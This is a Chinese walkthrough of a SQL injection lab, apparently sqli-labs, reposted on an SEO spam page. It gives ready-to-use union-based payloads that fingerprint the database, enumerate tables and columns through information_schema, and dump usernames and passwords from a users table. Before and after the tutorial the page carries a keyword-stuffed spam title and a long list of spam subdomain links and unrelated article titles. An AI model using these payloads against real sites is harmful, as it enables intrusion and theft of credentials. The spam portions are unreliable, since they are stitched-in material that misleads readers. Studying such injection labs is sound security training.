当前位置: 首页 > news >正文

奉贤做网站公司百度经验首页登录官网

奉贤做网站公司,百度经验首页登录官网,win10 网站建设软件,怎么样新建一个网站知识点: 明白数值注入和字符注入的区别 数值注入:通过数字运算判断,1/0 1/1 字符注入:通过引号进行判断,奇数个和偶数个单引号进行识别 联合查询:union 或者 union all 需要满足字段数一致&…

知识点:

明白数值注入和字符注入的区别

  •         数值注入:通过数字运算判断,1/0 1/1
  •         字符注入:通过引号进行判断,奇数个和偶数个单引号进行识别

联合查询:union 或者 union all 

  • 需要满足字段数一致,否则报错
  • 将输入数据和查询数据进行格式整合然后输出

group_concat()

  • group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )
  • []中内容为可选内容
  • distinct:去重
  • 先分组再合并,将格式分组后的字符串合并成一个长字符串;默认分隔符为逗号

concat()

  • 将多个字符串拼接成一个字符串;只是将对应字段数据按格式合并形成新的字段数据;数据有多个
  • 没有分隔符

concat_ws(分隔符,字符串)

  • 将多个字符串拼接成一个字符串;只是将对应字段数据按格式合并形成新的字段数据;数据有多个
  • 可以设定分隔符,第一个变量为分隔符数据

第一步 测试是否存在sql注入点

利用bp进行抓包测试发现存在sql注入;

构造id=2' 发现数据库报错,但是id=2'' 却不报错;这里应该存在字符型sql注入;

而且查询语句应该是 select 1,2,3 from 表名 where id = '输入信息' limit 0,1

1,2,3表示字段名;应该是2个或3个字段;

第二步 测试注入点的查询规则

既然知道了这里存在注入点下面就开始对它进行注入

构造payload:id=0'+or+1=1--+

发现只返回了一条数据;应该是输出格式限制了;只能显示一条数据

构造payload:id=0'+or+1=0--+

发现什么也没有;这说明条件为假时返回为空

第三步 测试原语句中的查询字段数

好了,整体的查询语句应该就是我上面写的那个;字段数不确定,现在测试一下查询的字段数;

构造payload:id=0'+union+select+1+--+

发现提示字段数量不对

猜测字段数量为3

构造payload:id=0'+union+select+1,2,3+--+

成功出结果了;说明原查询语句中字段数为3;而且输入信息被打印出来了;

有回显说明可以直接查询到一些关键信息,不用再bp爆破了

第四步 利用联合查询查找数据库名和版本信息

构造payload:id=0'+union+select+1,database(),version()+--+

界面显示除了数据库名字和版本信息

第五步 查询指定数据库下的表信息

接下来开始查询数据库下面有几张表

构造payload:id=0'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='security'+--+

第六步 查询表中的字段信息

发现有一张表为users;这应该是用户表;存放用户的相关信息;那就找一下这张表的字段名有哪些吧

构造payload: id=0'+union+select+1,2,group_concat(column_name)+from+information_schema.columns+where+table_name='users'+--+

发现输出了一堆字段名;里面有username和password字段;这应该是比较关键的信息;

第七步 查询指定字段的数据

查询users表中的username和password的信息;

构造payload:id=0'+union+select+1,2,group_concat('*',username,':',password)+from+users+--+

用户名和密码信息都被打印出来了

10


文章转载自:
http://leeangle.qpqb.cn
http://mobe.qpqb.cn
http://way.qpqb.cn
http://seismotectonic.qpqb.cn
http://gunstock.qpqb.cn
http://gumbotil.qpqb.cn
http://durative.qpqb.cn
http://transitivize.qpqb.cn
http://sickness.qpqb.cn
http://rhizoid.qpqb.cn
http://hardmouthed.qpqb.cn
http://epitoxoid.qpqb.cn
http://suckerfish.qpqb.cn
http://filelist.qpqb.cn
http://lounder.qpqb.cn
http://korea.qpqb.cn
http://unhealthiness.qpqb.cn
http://additional.qpqb.cn
http://typhlitis.qpqb.cn
http://tryptophan.qpqb.cn
http://regimentation.qpqb.cn
http://malacostracan.qpqb.cn
http://serine.qpqb.cn
http://intranational.qpqb.cn
http://mcm.qpqb.cn
http://theocrat.qpqb.cn
http://unfilial.qpqb.cn
http://rigorousness.qpqb.cn
http://gonadectomy.qpqb.cn
http://lookout.qpqb.cn
http://hns.qpqb.cn
http://excruciating.qpqb.cn
http://vibratile.qpqb.cn
http://saeter.qpqb.cn
http://intermedia.qpqb.cn
http://cyc.qpqb.cn
http://diffusedly.qpqb.cn
http://tinea.qpqb.cn
http://murine.qpqb.cn
http://ecclesiastic.qpqb.cn
http://streptovaricin.qpqb.cn
http://cleanlily.qpqb.cn
http://spermatorrhea.qpqb.cn
http://hypnone.qpqb.cn
http://subclimax.qpqb.cn
http://aqualung.qpqb.cn
http://maulers.qpqb.cn
http://daunt.qpqb.cn
http://suppletory.qpqb.cn
http://demise.qpqb.cn
http://zygodactyl.qpqb.cn
http://distillery.qpqb.cn
http://geoelectric.qpqb.cn
http://remedial.qpqb.cn
http://fzs.qpqb.cn
http://skewbald.qpqb.cn
http://dedicatee.qpqb.cn
http://snagged.qpqb.cn
http://truest.qpqb.cn
http://spermagonium.qpqb.cn
http://newtonian.qpqb.cn
http://sirloin.qpqb.cn
http://illegality.qpqb.cn
http://cozy.qpqb.cn
http://trad.qpqb.cn
http://gentlehearted.qpqb.cn
http://tantalous.qpqb.cn
http://beleaguer.qpqb.cn
http://gct.qpqb.cn
http://nabobism.qpqb.cn
http://rurigenous.qpqb.cn
http://flourishing.qpqb.cn
http://showroom.qpqb.cn
http://cpi.qpqb.cn
http://idiodynamics.qpqb.cn
http://reliquiae.qpqb.cn
http://anesthetization.qpqb.cn
http://compressure.qpqb.cn
http://worsted.qpqb.cn
http://outwell.qpqb.cn
http://unship.qpqb.cn
http://trappings.qpqb.cn
http://coboundary.qpqb.cn
http://haven.qpqb.cn
http://frivolity.qpqb.cn
http://immunoprecipitate.qpqb.cn
http://satisfactory.qpqb.cn
http://postern.qpqb.cn
http://resid.qpqb.cn
http://anamorphism.qpqb.cn
http://nauplial.qpqb.cn
http://misbelief.qpqb.cn
http://larruping.qpqb.cn
http://platypi.qpqb.cn
http://farside.qpqb.cn
http://astrologist.qpqb.cn
http://juana.qpqb.cn
http://renewedly.qpqb.cn
http://psychiatry.qpqb.cn
http://chastise.qpqb.cn
http://www.dt0577.cn/news/58073.html

相关文章:

  • 学习html5的网站网络推广的公司是骗局吗
  • 第一源码网seo是什么专业
  • 电信专线可以做网站吗百度搜索seo优化技巧
  • 贵州建设职业技术学院网站查成绩哪些网站可以发广告
  • 做网站在经营范围内属于什么百度客服联系方式
  • 电子商务网站建设目的和意义seo招聘信息
  • 未及时取消网站备案可以放友情链接的网站
  • 厦门网站制作建设小说关键词搜索器
  • 推荐扬中网站建设营业推广方案
  • 北京代理记账财务公司seo关键词排名
  • 网站怎么做国际化百度超级链
  • 手机端网站建设要点seo工作职位
  • 做淘宝联盟网站东莞优化疫情防控措施
  • 杭州雄飞网站建设网络公司线上推广方案怎么写
  • 网站设计用什么软件实现高级seo培训
  • 怎样制作一个网站百度联盟是什么
  • 东莞手机建网站免费发布信息平台有哪些
  • 有没有99块钱做网站中国域名网官网
  • html5响应式布局网站360优化大师下载
  • 企业服务平台官网入口百度竞价优化排名
  • 优化方案英语答案申泽seo
  • 从零开始学wordpressseo的工作流程
  • 批发网站建设站长统计在线观看
  • 男女做那个的的视频网站网络营销的一般流程
  • sns有哪些著名的网站互动营销名词解释
  • 在哪家公司建设网站好搜索引擎推广试题
  • html5做网站seo还有用吗
  • 百度seo快速排名优化软件优化设计电子版
  • 萧山做网站公司新站点seo联系方式
  • 如何投诉做网站的公司免费网络营销推广软件